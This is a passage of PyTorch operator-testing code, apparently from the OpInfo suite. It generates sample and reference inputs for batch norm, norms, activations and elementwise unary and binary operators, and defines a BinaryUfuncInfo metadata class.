requires_grad=requires_grad) make_arg_without_requires_grad = partial(make_tensor, device=device, dtype=dtype, requires_grad=False) # Ordered as: input shape, kwargs for training, momentum, eps cases: Tuple[Tuple[int], dict] = ( # type: ignore[assignment] ((S, S, S), {'training': True, 'momentum': 0.5, 'eps': 0.6}), ((3, 2, 4), {'training': False, 'momentum': -1.2}), ((3, 1), {'training': True, 'momentum': 0.0}), ((0,), {'training': True}), ((0,), {'training': False}), ((3, 2, 3, 4), {'training': True, 'momentum': -1.0, 'eps': 0.5}), ((3, 2, 3, 4), {'training': False, 'momentum': -1.0, 'eps': 0.5}), ((2, 1), {}), ) for input_shape, kwargs in cases: # args: running mean, running var, weight and bias should necessarily be of shape: (channels,) channels = input_shape[1] if len(input_shape) > 1 else 0 weight = make_arg(channels) if channels > 0 else None bias = make_arg(channels) if channels > 0 else None running_mean = make_arg_without_requires_grad(channels, low=0) running_var = make_arg_without_requires_grad(channels, low=0) yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, weight, bias ), kwargs=kwargs ) # Checking for permutations of 
weights and biases as `None` weights = [channels, None, None] biases = [None, channels, None] is_training = [True, False, False] for weight, bias, training in zip(weights, biases, is_training): yield SampleInput( make_arg(input_shape), args=( running_mean, running_var, make_arg(channels), make_arg(channels) ), kwargs={'training': training} ) # Test case for no optional kwargs # running_mean and running_var are required in evaluation mode (training: False) but not in training mode yield SampleInput(make_arg((1, 2, 3)), args=(None, None), kwargs={'training': True}) def sample_inputs_nn_activation_relu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: yield SampleInput(make_arg(shape)) def sample_inputs_nn_functional_prelu(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( (()), ((S, )), ((S, S)), ((S, M, S)) ) for shape in cases: for weight in [-1., 0., 0.8, 1.]: weight_tensor = torch.tensor(weight, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg(shape), args=(weight_tensor,)) if len(shape) >= 2: channel_size = shape[1] yield SampleInput(make_arg(shape), args=(make_arg((channel_size,)),)) weight_tensor = torch.tensor(1., device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=weight_tensor,)) yield SampleInput(make_arg((S, S)), kwargs=dict(weight=make_arg((S,)),)) def sample_inputs_norm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # ord = inf is tested in inputs_norm_inf as it fails on some tests cases = [ ((S, S), (2,), '2'), ((S, S), (0,), '0'), ((S, S), (0.5,), '0_5'), ((S, S), (1,), '1'), ((S, S), (3,), '3'), ((S, S), (-1,), 'neg_1'), ((S, S), (-2,), 'neg_2'), ((S, S), (-0.5,), 'neg_0_5'), ((S, S), (-1.5,), 'neg_1_5'), ] cases_nonzero_input = ( ((S, S, S), (1.5,), '1_5_default'), ((S, S, S), (1.5, 1), '1_5_dim'), ((S, S, S), (1.5, -1), '1_5_neg_dim'), ((S, S, S), (1.5, 1, True), 'keepdim_1_5_dim'), ((S, S, S), (1.5, -1, True), 'keepdim_1_5_neg_dim'), ) cases_posdim = ( ((S, S), (-2, 1,), 'neg_2_dim'), ((S, S), (-1, 1,), 'neg_1_dim'), ((S, S), (0, 1,), '0_dim'), ((S, S), (1, 1,), '1_dim'), ((S, S), (2, 1,), '2_dim'), ((S, S), (3, 1,), '3_dim'), ((S, S, S), (2, 1), '2_dim'), ((S, S, S), (3, 1), '3_dim'), ((S, S, S), (2, 1, True), 'keepdim_2_dim'), ((S, S, S), (3, 1, True), 'keepdim_3_dim'), ((), (2, 0), '2_dim_scalar'), ((), (3, 0), '3_dim_scalar'), ((), (2, 0, True), 'keepdim_2_dim_scalar'), ((), (3, 0, True), 'keepdim_3_dim_scalar'), ) cases_negdim = ((shape, args[:1] + (-args[1],) + args[2:], name.replace("_dim", "_neg_dim")) for shape, args, name in cases_posdim) for shape, args, name in itertools.chain(cases, cases_posdim, cases_negdim): yield SampleInput(make_arg(shape), args=args, name=name) for shape, args, name in cases_nonzero_input: yield SampleInput(make_arg(shape, exclude_zero=True), args=args, name=name) def sample_inputs_norm_fro(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (), 'default'), ((S, S), ('fro',), 'fro_default'), ((S, S), ('fro', [0, 1],), 'fro'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), 
args=args, name=name) def sample_inputs_norm_nuc(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), ('nuc',), 'nuc'), ((S, S, S), ('nuc', [1, 2]), 'nuc_batched'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_inputs_norm_inf(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases = ( ((S, S), (-inf,), '-inf'), ((S, S), (inf,), 'inf'), ((S, S), (inf, 1,), 'inf_2_dim'), ((S, S), (inf, -1,), 'inf_2_neg_dim'), ) for shape, args, name in cases: yield SampleInput(make_arg(shape), args=args, name=name) def sample_kwargs_vector_norm(t, **kwargs): # orders with / without identity def ords(): has_id = (6, 4, 2, 1, 0, 0.9) no_id = (inf, -2.1, -inf) if t.numel() == 0: dim = kwargs.get("dim") if dim is None: return has_id if not isinstance(dim, Iterable): dim = (dim,) for d in dim: if t.size(d) == 0: return has_id return has_id + no_id return (((), dict(ord=o)) for o in ords()) # The following functions and classes are for testing elementwise binary operators. # Returns a generator of pairs of contiguous tensors on the requested device # and with the requested dtype. # # This function is intended to test the non-vectorized and vectorized code # paths of elementwise binary functions, as well as their handling of odd tensor # sizes (like zero-dim tensors and tensors with zero elements). # # Each iterable will include an a tensor with no elements, # zero dim (scalar) tensors, small 1D tensors, a medium 1D tensor, and # a large 2D tensor. def generate_elementwise_binary_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): shapes = ( # tensors with no elements (0,), (1, 0, 3), # zero dim (scalar) tensor (), # small 1D tensor (20,), # medium 1D tensor (812,), # large 2D tensor (1029, 917), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) b = make_arg(shape) yield SampleInput(a, args=(b,)) # Returns a generator of pairs of contiguous tensors on the requested device and with # the requested dtype. # # Unlike the previous function, the values in these tensors are specified manually. 
def generate_elementwise_binary_small_value_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=None ): if exclude_zero is None: if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) # defines interesting values _unsigned_int_vals = (0, 1, 55, 127, 128, 190, 210, 220, 254) _int_vals = (0, -1, 1, -55, 55, -127, 127, -128) _float_vals = ( 0.0, -0.001, 0.001, -0.25, 0.25, -1.0, 1.0, -math.pi / 2, math.pi / 2, -math.pi + 0.00001, math.pi - 0.00001, -math.pi, math.pi, -math.pi - 0.00001, math.pi + 0.00001, ) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_vals, _float_vals) elif dtype.is_complex: complex_vals = product(_float_vals, _float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int8, torch.int16, torch.int32, torch.int64): prod = product(_int_vals, _int_vals) elif dtype is torch.uint8: prod = product(_unsigned_int_vals, _unsigned_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) if r == 0 and exclude_zero: r_vals.append(1) else: r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_large_value_tensors( op, *, device, dtype, requires_grad=False ): _large_int_vals = (-1113, 1113, -10701, 10701) _large_float16_vals = (-501, 501, -1001.2, 1001.2, -13437.7, 13437.7) _large_float_vals = _large_float16_vals + (-4988429.2, 4988429.2, -1e20, 1e20) l_vals = [] r_vals = [] if dtype == torch.float16: prod = product(_large_float16_vals, _large_float16_vals) elif dtype.is_floating_point: prod = product(_large_float_vals, _large_float_vals) elif dtype.is_complex: complex_vals = product(_large_float_vals, _large_float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int16, torch.int32, torch.int64): prod = product(_large_int_vals, _large_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): _float_extremals = (float("inf"), float("-inf"), float("nan")) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_extremals, _float_extremals) elif dtype.is_complex: complex_vals = product(_float_extremals, _float_extremals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) 
rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) # Test case for NaN propagation nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan')) lhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) lhs.flatten()[::3] = nan rhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad) rhs.flatten()[::3] = nan yield SampleInput(lhs, args=(rhs,)) # Returns a generator of pairs of contiguous and noncontiguous tensors that # require broadcasting def generate_elementwise_binary_broadcasting_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False ): shapes = ( ((1,), ()), ((2,), ()), ((1,), (2,)), ((2, 1), (2,)), ((1, 2), (2,)), ((3, 2), (2,)), ((1, 3, 2), (2,)), ((1, 3, 2), (3, 2)), ((3, 1, 2), (3, 2)), ((2, 3, 2), ()), ((3, 1, 2), (1, 3, 2)), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) for shape, noncontiguous in product(shapes, [True, False]): shape_lhs, shape_rhs = shape lhs = make_arg( shape_lhs, noncontiguous=noncontiguous, **op.lhs_make_tensor_kwargs ) rhs = make_arg( shape_rhs, noncontiguous=noncontiguous, **op.rhs_make_tensor_kwargs ) yield SampleInput(lhs, args=(rhs,), broadcasts_input=True) # Returns a generator of pairs of contiguous tensors and scalars def generate_elementwise_binary_with_scalar_samples( op, *, device, dtype, requires_grad=False ): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shapes = ((), (3,), (5, 3), (0, 1, 3), (1, 5)) if op.supports_rhs_python_scalar: for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs, args=(rhs_scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(lhs_scalar, args=(rhs,)) if op.supports_two_python_scalars: lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item() rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item() yield SampleInput(lhs_scalar, args=(rhs_scalar,)) # Returns a generator of pairs of contiguous tensors and 0d tensos and scalars and type promotion def generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, *, device, dtype, requires_grad=False ): # add these samples only for logical and comparison ops, arithmetic ops are not happy about extremal scalars if op.name in ('eq', 'ne', 'gt', 'ge', 'lt', 'le', 'logical_and', 'logical_or', 'logical_xor'): make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) shape = (23,) # this shape is big enough to trigger vectorization, and has non-vectorized tail values = (float('nan'), float('inf'), -float('inf')) scalar_tensors = tuple(torch.tensor(val) for val in values) if op.supports_rhs_python_scalar: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) for scalar in values + scalar_tensors: yield SampleInput(lhs, args=(scalar,)) # Extends with scalar lhs if op.supports_one_python_scalar: yield SampleInput(scalar, args=(rhs,)) # Returns a generator of pairs of noncontiguous tensors def generate_elementwise_binary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=False ): make_arg = partial( make_tensor, device=device, 
dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # Generic noncontiguity lhs = make_arg((1026,), noncontiguous=True, **op.lhs_make_tensor_kwargs) rhs = make_arg((1026,), noncontiguous=True, **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.clone(), args=(rhs.clone(),)) yield SampleInput(lhs.contiguous(), args=(rhs,)) # Transposed lhs = make_arg((789, 357), **op.lhs_make_tensor_kwargs) rhs = make_arg((789, 357), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs.T, args=(rhs.T,)) # More noncontiguity shapes = ((5, 7), (1024,)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] lhs_non_contig.copy_(lhs) rhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0] rhs_non_contig.copy_(rhs) yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Noncontiguous indices shape = (2, 2, 1, 2) lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs[:, 1, ...] rhs_non_contig = rhs[:, 1, ...] yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),)) yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,)) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: lhs = make_arg(shape, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape, **op.rhs_make_tensor_kwargs) lhs_non_contig = lhs.expand(3, -1, -1) rhs_non_contig = rhs.expand(3, -1, -1) yield SampleInput(lhs_non_contig, args=(rhs_non_contig,)) # Sample inputs for elementwise binary operators, like add def sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): # Default exclude_zero to False so make_arg is always well-defined, even for ops without rhs_make_tensor_kwargs exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) if hasattr(op, "rhs_make_tensor_kwargs") else False make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)), ) sample_kwargs = kwargs.get("sample_kwargs", {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs, **op.lhs_make_tensor_kwargs) rhs = make_arg(shape_rhs, **op.rhs_make_tensor_kwargs) broadcasts_input = shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs) yield SampleInput( lhs, args=(rhs,), kwargs=sample_kwargs, broadcasts_input=broadcasts_input ) def sample_inputs_jiterator(op, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M, S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) num_inputs = kwargs.get('num_inputs') sample_kwargs = kwargs.get('sample_kwargs', {}) for shape_lhs, shape_rhs in shapes: lhs = make_arg(shape_lhs) args = [] for i in range(num_inputs - 1): args.append(make_arg(shape_rhs)) broadcasts_input = (shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs)) yield SampleInput(lhs, args=tuple(args), kwargs=sample_kwargs, broadcasts_input=broadcasts_input) def sample_inputs_broadcast_shapes(op, device, dtype, requires_grad, **kwargs): shapes = ( ((), ()), ((S,), ()), ((S, 1), (S,)), ((S, 1), S), ((M, S), ()), ((S, M, S), (M, S)), ((S, M, S), (S, M,
S)), ((M, 1, S), (M, S)), ((M, 1, S), (1, M, S)), ((0, 1, 3), (0, 10, 3)) ) for shape in shapes: inp, *arg0 = shape yield SampleInput(inp, args=arg0) # The base reference input generation for elementwise binary operations def _reference_inputs_elementwise_binary(op, device, dtype, requires_grad, exclude_zero, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_binary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) if dtype is not torch.bool: yield from generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype not in (torch.bool, torch.uint8, torch.int8): yield from generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) # TODO: FIXME: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype not in (torch.chalf,): yield from generate_elementwise_binary_broadcasting_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_with_scalar_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) yield from generate_elementwise_binary_with_scalar_and_type_promotion_samples( op, device=device, dtype=dtype, requires_grad=requires_grad ) if dtype.is_floating_point or dtype.is_complex: yield from generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ) # Note that some of these reference inputs use scalars for the SampleInput.input value, # while many tests require SampleInput.input to be a tensor or a list of tensors def reference_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs): # Default exclude_zero to False for ops that carry no rhs_make_tensor_kwargs exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) if hasattr(op, "rhs_make_tensor_kwargs") else False gen = partial( _reference_inputs_elementwise_binary, op, device, dtype, requires_grad, exclude_zero, **kwargs ) # yields "normal" samples yield from gen() # TODO: RuntimeError: "index_select" not implemented for 'ComplexHalf' if dtype is torch.chalf: return # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_binary_noncontiguous_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) yield from generate_elementwise_binary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero ) # A functional that extends an elementwise binary operator's bespoke error inputs # with generic error inputs for the class of elementwise binary operations def make_error_inputs_elementwise_binary(error_inputs_func): def error_inputs_func_wrapper(op, device, **kwargs): if error_inputs_func is not None: yield from error_inputs_func(op, device, **kwargs) if not op.supports_rhs_python_scalar: si = SampleInput(torch.tensor((1, 2, 3), device=device), args=(2,)) yield ErrorInput(si, error_type=Exception, error_regex="") if not op.supports_one_python_scalar: si = SampleInput(2, args=(torch.tensor((1, 2, 3), device=device),)) yield ErrorInput(si, error_type=Exception, error_regex="") if ( not kwargs.get("skip_two_python_scalars", False) and not op.supports_two_python_scalars ): si = SampleInput(2, args=(3,)) yield ErrorInput(si, error_type=Exception, error_regex="") return error_inputs_func_wrapper # Metadata class for binary "universal functions (ufuncs)" that accept two # tensors and
have common properties class BinaryUfuncInfo(OpInfo): """Operator information for 'universal binary functions (binary ufuncs).' These are functions of two tensors with common properties like: - they are elementwise functions - the output shape is determined by the input shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/stable/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, *, sample_inputs_func=sample_inputs_elementwise_binary, reference_inputs_func=reference_inputs_elementwise_binary, error_inputs_func=None, lhs_make_tensor_kwargs=None, rhs_make_tensor_kwargs=None, promotes_int_to_float=False, # Set to true if the op promotes integer inputs to float always_returns_bool=False, # Set to true if the op always returns bool tensors supports_rhs_python_scalar=True, # Whether the operator allows Tensor x scalar inputs supports_one_python_scalar=False, # Whether the operator allows scalar x tensor and tensor x scalar inputs supports_two_python_scalars=False, # Whether the operator allows scalar x scalar inputs **kwargs, ): self._original_binary_ufunc_args = locals().copy() # Elementwise binary operations perform the equivalent of test_numpy_refs # in test_binary_ufuncs, but with additional test granularity. So the # generic test_ops.py test is skipped because it's redundant. common_skips = ( DecorateInfo( unittest.skip("Skipping redundant test."), "TestCommon", "test_numpy_refs", ), ) kwargs["skips"] = kwargs.get("skips", tuple()) + common_skips super(BinaryUfuncInfo, self).__init__( name, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, error_inputs_func=make_error_inputs_elementwise_binary(error_inputs_func), **kwargs, ) # [lr]hs_make_tensor_kwargs are part of the OpInfo to be able to dynamically generate valid samples later on. if lhs_make_tensor_kwargs is None: lhs_make_tensor_kwargs = {} self.lhs_make_tensor_kwargs = lhs_make_tensor_kwargs if rhs_make_tensor_kwargs is None: rhs_make_tensor_kwargs = {} self.rhs_make_tensor_kwargs = rhs_make_tensor_kwargs self.promotes_int_to_float = promotes_int_to_float self.always_returns_bool = always_returns_bool self.supports_rhs_python_scalar = supports_rhs_python_scalar self.supports_one_python_scalar = supports_one_python_scalar self.supports_two_python_scalars = supports_two_python_scalars if self.supports_two_python_scalars: self.supports_one_python_scalar = True if self.supports_one_python_scalar: assert ( supports_rhs_python_scalar ), "Can't support lhs and rhs Python scalars but not rhs scalars!" # The following functions and classes are for testing elementwise unary operators. 
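# Illustrative sketch (not part of the suite): for a hypothetical `asin_opinfo`
# whose domain is (-1, 1), the generator below yields in-domain tensors in a
# 1D, an empty, and a scalar shape, assuming this module's size constant L == 20:
#
#   >>> samples = list(sample_inputs_elementwise_unary(
#   ...     asin_opinfo, 'cpu', torch.float32, requires_grad=False))
#   >>> [s.input.shape for s in samples]
#   [torch.Size([20]), torch.Size([1, 0, 3]), torch.Size([])]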
def sample_inputs_elementwise_unary( op_info, device, dtype, requires_grad, op_kwargs=None, **kwargs ): if not op_kwargs: op_kwargs = {} low, high = op_info.domain low = low if low is None else low + op_info._domain_eps high = high if high is None else high - op_info._domain_eps if op_info.supports_sparse_csr: # Tensors with dim=2 for sparse CSR testing yield SampleInput( make_tensor( (L, L), device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) else: # Creates a 1D, empty, and scalar tensor for shape in ((L,), (1, 0, 3), ()): yield SampleInput( make_tensor( shape, device=device, dtype=dtype, low=low, high=high, requires_grad=requires_grad, ), kwargs=op_kwargs, ) # Replace values satisfying condition with a safe value. This is used to block # out values that could cause a singularity, like tan(pi/2) def _replace_values_in_tensor(tensor, condition, safe_value): mask = condition(tensor) tensor.masked_fill_(mask, safe_value) # Helper to create a unary elementwise tensor with valid inputs def _make_unary_elementwise_tensor(shape, *, op, dtype, **kwargs): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps a = make_tensor(shape, low=low, high=high, dtype=dtype, **kwargs) if op.reference_numerics_filter is not None and dtype is not torch.bool: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) return a # Restricts the values in the tensor to the domain of the # given elementwise unary operator def _filter_unary_elementwise_tensor(a, *, op): # short-circuits for boolean tensors if a.dtype is torch.bool: return a low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps if a.dtype is torch.uint8 and low is not None: low = max(low, 0) if not a.dtype.is_floating_point and not a.dtype.is_complex: low = math.ceil(low) if low is not None else None high = math.floor(high) if high is not None else None if op.reference_numerics_filter is not None: condition, safe_value = op.reference_numerics_filter _replace_values_in_tensor(a, condition, safe_value) if low is not None or high is not None: if a.dtype.is_complex: a.real.clamp_(low, high) a.imag.clamp_(low, high) else: a.clamp_(min=low, max=high) return a def generate_elementwise_unary_tensors(op, *, device, dtype, requires_grad, **kwargs): # Special-cases bool if dtype is torch.bool: tensors = ( torch.empty(0, device=device, dtype=torch.bool), torch.tensor(True, device=device), torch.tensor(False, device=device), torch.tensor((True, False), device=device), make_tensor((812,), device=device, dtype=dtype), make_tensor((1029, 917), device=device, dtype=dtype), ) for a in tensors: yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) shapes = ( (1029, 917), (812,), # Empty sizes (0,), (0, 3, 3), (1, 0, 5), (6, 0, 0, 0), (3, 0, 1, 0), ) make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) for shape in shapes: a = make_arg(shape) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_small_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) def
generate_elementwise_unary_large_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(sample.input, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): yield SampleInput( sample.input, kwargs=op.sample_kwargs(device, dtype, sample.input)[0] ) def generate_elementwise_unary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False ): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) # Generic noncontiguity t = make_arg((1026,), noncontiguous=True) yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Transposed t = make_arg((1024, 1024)).T yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: t = make_arg(shape) t_non_contig = t.expand(3, -1, -1) yield SampleInput( t_non_contig, kwargs=op.sample_kwargs(device, dtype, t_non_contig)[0] ) def generate_elementwise_unary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) # Reuses the elementwise binary generators for consistency # TODO: in the future generalize the reference generators to handle n-ary elementwise operations def _reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_unary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype is not torch.bool: yield from generate_elementwise_unary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype not in (torch.bool, torch.uint8, torch.int8) and ( op.handles_large_floats or (not dtype.is_floating_point and not dtype.is_complex) ): yield from generate_elementwise_unary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype.is_floating_point or (op.handles_complex_extremal_values and dtype.is_complex): yield from generate_elementwise_unary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) def reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): gen = partial( _reference_inputs_elementwise_unary, op, device, dtype, requires_grad, **kwargs ) # yields "normal" samples yield from gen() # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from 